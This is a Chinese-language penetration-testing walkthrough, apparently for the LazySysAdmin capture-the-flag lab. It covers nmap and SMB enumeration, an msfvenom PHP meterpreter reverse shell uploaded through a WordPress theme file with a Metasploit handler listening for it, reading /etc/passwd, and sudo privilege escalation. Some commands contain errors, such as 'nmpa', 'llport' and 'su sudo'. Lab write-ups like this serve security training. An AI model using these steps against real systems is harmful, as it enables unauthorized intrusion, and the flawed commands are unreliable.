1.信息探测

扫描探测开放的服务

#开放服务信息
nmap -sV 192.168.2.112
#挖掘全部信息
nmpa -A -v -T4 192.168.2.112

2.分析探测结果

在扫描结果中查找特殊端口
针对SMB协议弱点分析

• 针对SMB协议，使用空口令、弱口令尝试登录，查看敏感文件，下载查看

smbclient -L 192.168.2.112
smbclient '\\192.168.2.112\share'
get 敏感文件

• 针对SMB协议远程溢出漏洞进行分析

searchsploit samba版本号

• 尝试利用获取的数据库口令登录

mysql -h 192.168.2.112 -u Admin -p

3.针对HTTP协议弱点分析

• 浏览器查看网站
• 使用dirb nikto探测

#探测是否有后台登录界面
dirb http://192.168.2.112/

• 寻找突破点，登录目标后台，上传webshell

#制作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.2.112 lport=4444 -f raw > /root/Desktop/shell.php
#启动监听
msfconsole
>use exploit/multi/handler
>set payload php/meterpreter/reverse_tcp
>set lhost 192.168.2.110
>set llport 4444
>run

• 上传webshell

#使用找到的敏感信息登录后台，上传并执行webshell
#获得反弹的shell--WordPress上传theme 404.php
http://192.168.2.112/wordpress/wp-content/themes/twentyfourteen/404.php
#优化终端
python -c "import pty;pty.spawn('/bin/bash')"
#查找用户名
cat /etc/passwd
#查找密码：在共享目录下的敏感文件，提升权限
su 用户名
#查看当前用户的sudo授权
sudo -l
#返回结果
User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL
#提升权限
su sudo

4.总结

对于开放139和445端口的机器一定注意是否可以直接使用smbclient登录到共享目录查找敏感文件
一般情况下flag值都在/root目录下，并且需要提升root权限才能查看内容